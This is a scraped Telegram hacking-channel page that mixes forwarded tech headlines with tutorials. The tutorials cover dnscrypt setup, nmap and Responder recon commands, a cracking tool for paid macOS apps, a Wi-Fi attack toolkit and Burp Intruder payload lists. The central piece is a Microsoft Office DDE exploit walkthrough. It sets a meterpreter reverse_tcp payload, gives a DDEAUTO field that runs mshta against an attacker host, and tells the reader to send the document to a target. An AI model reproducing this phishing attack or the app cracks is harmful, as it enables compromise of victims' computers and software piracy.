UNDERCODE COMMUNITY
2.67K subscribers
1.23K photos
31 videos
2.65K files
79.5K links
πŸ¦‘ Undercode Cyber World!
@UndercodeCommunity


1️⃣ World first platform which Collect & Analyzes every New hacking method.
+ AI Pratice
@Undercode_Testing

2️⃣ Cyber & Tech NEWS:
@Undercode_News

3️⃣ CVE @Daily_CVE

✨ Web & Services:
β†’ Undercode.help
Download Telegram
Forwarded from UNDERCODE NEWS
A bug in Microsoft Teams causes concerns for several users.
#Bugs
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘MORE SECURITY AND ANONIMITY :

πŸ›‘ How to install dnscrypt proxy with ad blocker on Linux ??

COPY AND PASTE COMMANDS TO YOUR TERM:
Run the command according to your Linux distribution as root user:

A)
Debian / Ubuntu users use apt / apt-get ##

$ sudo apt install dnscrypt-proxy


## Alpine Linux users use apk ##

$ sudo apk add dnscrypt-proxy

## CentOS / RHEL users:

## Add EPEL repository on CentOS 8 or RHEL 8

## use yum ##

$ sudo yum install dnscrypt-proxy

## Arch Linux use pacman ##

$ sudo pacman -S dnscrypt-proxy

## OpenSUSE / SUSE Linux users use zypper ##

$ sudo zypper in dnscrypt-proxy

## Fedora users use dnf ##

$ sudo dnf install dnscrypt-proxY

B)

Dnscrypt proxy configuration
Edit dnscrypt-proxy.toml in the / etc / dnscrypt-proxy / directory.

For example:



$ ls -l /etc/dnscrypt-proxy/
$ sudo vim /etc/dnscrypt-proxy/dnscrypt-proxy.toml

First, we need to set up a list of used servers.
Let's use both Google and Cloudflare:
server_names = [ 'google' 'cloudflare']
I can use cloudflare too:
server_names = [ 'cloudflare']
Configure the list of listening local addresses and ports:
listen_addresses = ['127.0.0.1:53', '[::1]:53']
For my VPN 172.168.0.0/24:

listen_addresses = ['127.0.0.1:53', '172.168.0.1:53' ]
If you have an IPv6 connection, use the servers available over IPv6 (IPv4 by default):
ipv6_servers = true
Make sure we are using servers that implement DNSCrypt and DoH protocol.
dnscrypt_servers = true
doh_servers = true
Make sure we enable DNS cache to reduce latency and outbound traffic:
cache = true
The server must support DNS Security Extensions (DNSSEC):
require_dnssec = true
Adblock lists consist of one template per line.
Examples of valid patterns:
##
## example.com
## =example.com
## ads.*
## ads*.example.*
## ads*.example[0-9]*.com
Blocking rules file path:
blacklist_file = '/etc/dnscrypt-proxy/blacklist.txt'
Save and close the file.
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
Russians taught batteries to charge in seconds.
#Technologies
Forwarded from UNDERCODE NEWS
Next year, TSMC and other vendors will support PS5 production or surpass 18 million next year.
#Technologies
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘Recon nmap and windows Hacking commands :
#Commnands :


# Enumerate subnet
nmap -sn 10.10.10.1/24

# Fast simple scan
nmap -sS 10.10.10.1/24
export IP=10.10.10.11

# Extracting Live IPs from Nmap Scan
nmap 10.1.1.1 --open -oG scan-results; cat scan-results | grep "/open" | cut -d " " -f 2 > exposed-services-ips

# Full complete slow scan with output
nmap -v -sT -A -T4 -p- -Pn --script vuln -oA full $IP

# Autorecon
python3 autorecon.py $IP

# Scan for UDP
nmap $IP -sU
unicornscan -mU -v -I $IP

# Connect to udp if one is open
nc -u $IP 48772

# Responder
responder -I eth0 -A

# Amass
amass enum $IP

# Generating nice scan report

nmap -sV IP_ADDRESS -oX scan.xml && xsltproc scan.xml -o "`date +%m%d%y`_report.html"
#Simple Port Knocking
for x in 7000 8000 9000; do nmap -Pn –host_timeout 201 –max-retries 0 -p $x 1.1.1.1; done
File enumeration :
Common :

# Check real file type
file file.xxx

# Analyze strings
strings file.xxx
strings -a -n 15 file.xxx # Check the entire file and outputs strings longer than 15 chars

# Check embedded files
binwalk file.xxx # Check
binwalk -e file.xxx # Extract

# Check as binary file in hex
ghex file.xxx

# Check metadata
exiftool file.xxx

# Stego tool for multiple formats
wget https://embeddedsw.net/zip/OpenPuff_release.zip
unzip OpenPuff_release.zip -d ./OpenPuff
wine OpenPuff/OpenPuff_release/OpenPuff.exe
Disk files

# guestmount can mount any kind of disk file
sudo apt-get install libguestfs-tools
guestmount --add yourVirtualDisk.vhdx --inspector --ro /mnt/anydirectory

▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
The recent patent from Apple confirms that potential MacBooks can be fitted with view keyboards.
#Technologies
Forwarded from UNDERCODE NEWS
Vodafone: here are the interesting end-of-year offers.
#Updates
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘ Windows Penetration Testing Using Microsoft Office DDE Exploit (MACROLESS) :

1) DDE exploitation was also known as dynamic data exchange, it allows data to be transferred between applications without any user interaction.

Hackers have used this technique to execute malicious scripts to compromise data.

This was reported to Microsoft by Sensepost, Etienne Stalmans and Saif El-Sherei, but this has not been fixed as many applications use the DDE protocol.

This exploit does not require a macro feature to be enabled.

Prerequisites - DDE exploit
Windows machine
Microsoft Office (any version)
Kali Linux
We will have to import the Metasploit exploit.

Download it from GitHub using the terminal command:

wget https://raw.githubusercontent.com/realoriginal/metasploit-framework/fb3410c4f2e47a003fd9910ce78f0fc72e513674/modules/exploits/windows/script/dde_delivery.rb
Move the script to the Metasploit location

mv dde_delivery.rb / usr / share / metasploit-framework / modules / exploits / windows /

2) Now enter msfconsole in the terminal that starts the Metasploit framework and enter reload_all to load modules.

3) use exploit/windows/dde_deliverythen set the sever host using the following command

set SRVHOST 192.168.177.141
we need to set up a payload listener.
Do not use port 8080 as the default server port is set to 8080

set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.177.141
set LPORT 6708
exploit

4) Now copy and paste the code into any text document.
We used Office 365 Pro Plus, completely revamped.
Find the formula and you should have a small error window in your document, then right click on the toggle code.
Paste the command into the document in parentheses.
Save your document.

{DDEAUTO C:\\Programs\\Microsoft\\Office\\MSword.exe\\..\\..\\..\\..\\windows\\system32\\mshta.exe β€œhttp://192.168.177.141:8080/mVg3YDU3gVQ”}

5) Send the document to the suspect and a counter session will open.

(don't copy our tips)
Β― \ _ (ツ) _ / Β―
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
Free delivery of monitoring software for malicious activity in US CISA, Azure and MS 365
#Malwares
Forwarded from UNDERCODE NEWS
A year went by with MacOS, which said there were more risks than Windows.
#Malwares
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘MacOS Apps Hacks :

This hack doesn't work on systems with SIP (System Integrity Protection) enabled, and it's enabled by default since El Capitan. It can be easily disabled from Recovery Mode but it's another layer of security which is always good to have so disabling it permanently is not the wisest idea. I'll implement some solution to bypass this restriction when I have time.


Β» Things 3 Trial :

Bear bear-pro

Sketch sketch-trial

VPN Master vpn-master-vip


πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

open term and type :

1) git clone https://github.com/gebeto/macos-hacks

2) cd macos-hacks

3) cd <APPLICATION>

4) make

5) You can use run.sh, it's a wrapper script that sets necessary environment variables to insert the lib and launches Applications (it assumes that installed to /Applications, edit the script if it differs for you).

enjoy :)
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
Foreign media: A separate promotional deal was signed by Google & Facebook, suspected of unfair price theft.
#International
Forwarded from UNDERCODE NEWS
Hedge funds show that Intel is considering a strategic sale, with the share price of the latter increasing by 5%
#International
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘wIFI HACK ALL IN ONE FOR TERMUX :


πŸ„ΈπŸ„½πŸ…‚πŸ…ƒπŸ„°πŸ„»πŸ„»πŸ„ΈπŸ…‚πŸ„°πŸ…ƒπŸ„ΈπŸ„ΎπŸ„½ & πŸ…πŸ…„πŸ„½ :

$ git clone https://github.com/mkdirlove/WI-TOOLKIT

$ cd WI-TOOLKIT

$ chmod +x *

$ ./install.sh

$ sudo python wi-toolkit.py

or

$ sudo python2 wi-toolkit.py

▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁
Forwarded from UNDERCODE NEWS
Amazon launches India's "Future Engineer" initiative for computer science education.
#International
Forwarded from UNDERCODE NEWS
After causing an 18-year-old Russian man to freeze to death, Google Maps announces improvements to navigation routes.
#Updates
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁

πŸ¦‘A free real collection of Burpsuite Intruder payloads

> BurpBounty payloads, fuzz list

> malicious file uploads

> web pentesting methodologies and checklists.

Spiders, Robots and Crawlers IG-001
Search Engine Discovery/Reconnaissance IG-002
Identify application entry points IG-003
Testing for Web Application Fingerprint IG-004
Application Discovery IG-005
Analysis of Error Codes IG-006
SSL/TLS Testing (SSL Version, Algorithms, Key length, Digital Cert. Validity) - SSL Weakness CM‐001
DB Listener Testing - DB Listener weak CM‐002
Infrastructure Configuration Management Testing - Infrastructure Configuration management weakness CM‐003
Application Configuration Management Testing - Application Configuration management weakness CM‐004
Testing for File Extensions Handling - File extensions handling CM‐005
Old, backup and unreferenced files - Old, backup and unreferenced files CM‐006
Infrastructure and Application Admin Interfaces - Access to Admin interfaces CM‐007
Testing for HTTP Methods and XST - HTTP Methods enabled, XST permitted, HTTP Verb CM‐008
Credentials transport over an encrypted channel - Credentials transport over an encrypted channel AT-001
Testing for user enumeration - User enumeration AT-002
Testing for Guessable (Dictionary) User Account - Guessable user account AT-003
Brute Force Testing - Credentials Brute forcing AT-004
Testing for bypassing authentication schema - Bypassing authentication schema AT-005
Testing for vulnerable remember password and pwd reset - Vulnerable remember password, weak pwd reset AT-006
Testing for Logout and Browser Cache Management - - Logout function not properly implemented, browser cache weakness AT-007
Testing for CAPTCHA - Weak Captcha implementation AT-008
Testing Multiple Factors Authentication - Weak Multiple Factors Authentication AT-009
Testing for Race Conditions - Race Conditions vulnerability AT-010
Testing for Session Management Schema - Bypassing Session Management Schema, Weak Session Token SM-001
Testing for Cookies attributes - Cookies are set not β€˜HTTP Only’, β€˜Secure’, and no time validity SM-002
Testing for Session Fixation - Session Fixation SM-003
Testing for Exposed Session Variables - Exposed sensitive session variables SM-004
Testing for CSRF - CSRF SM-005
Testing for Path Traversal - Path Traversal AZ-001
Testing for bypassing authorization schema - Bypassing authorization schema AZ-002
Testing for Privilege Escalation - Privilege Escalation AZ-003
Testing for Business Logic - Bypassable business logic BL-001
Testing for Reflected Cross Site Scripting - Reflected XSS DV-001
Testing for Stored Cross Site Scripting - Stored XSS DV-002
Testing for DOM based Cross Site Scripting - DOM XSS DV-003
Testing for Cross Site Flashing - Cross Site Flashing DV-004
SQL Injection - SQL Injection DV-005
LDAP Injection - LDAP Injection DV-006
ORM Injection - ORM Injection DV-007
XML Injection - XML Injection DV-008
SSI Injection - SSI Injection DV-009
XPath Injection - XPath Injection DV-010
IMAP/SMTP Injection - IMAP/SMTP Injection DV-011
Code Injection - Code Injection DV-012
OS Commanding - OS Commanding DV-013
Buffer overflow - Buffer overflow DV-014
Incubated vulnerability - Incubated vulnerability DV-015
Testing for HTTP Splitting/Smuggling - HTTP Splitting, Smuggling DV-016
Testing for SQL Wildcard Attacks - SQL Wildcard vulnerability DS-001
Locking Customer Accounts - Locking Customer Accounts DS-002
Testing for DoS Buffer Overflows - Buffer Overflows DS-003
User Specified Object Allocation - User Specified Object Allocation DS-004
User Input as a Loop Counter - User Input as a Loop Counter DS-005
Writing User Provided Data to Disk - Writing User Provided Data to Disk DS-006
Failure to Release Resources - Failure to Release Resources DS-007
Storing too Much Data in Session - Storing too Much Data in Session DS-008
WS Information Gathering - N.A. WS-001
Testing WSDL - WSDL Weakness WS-002
FREE :

https://github.com/1N3/IntruderPayloads
▁ β–‚ β–„ Uπ•Ÿπ”»β’Ίπ«Δ†π”¬π““β“” β–„ β–‚ ▁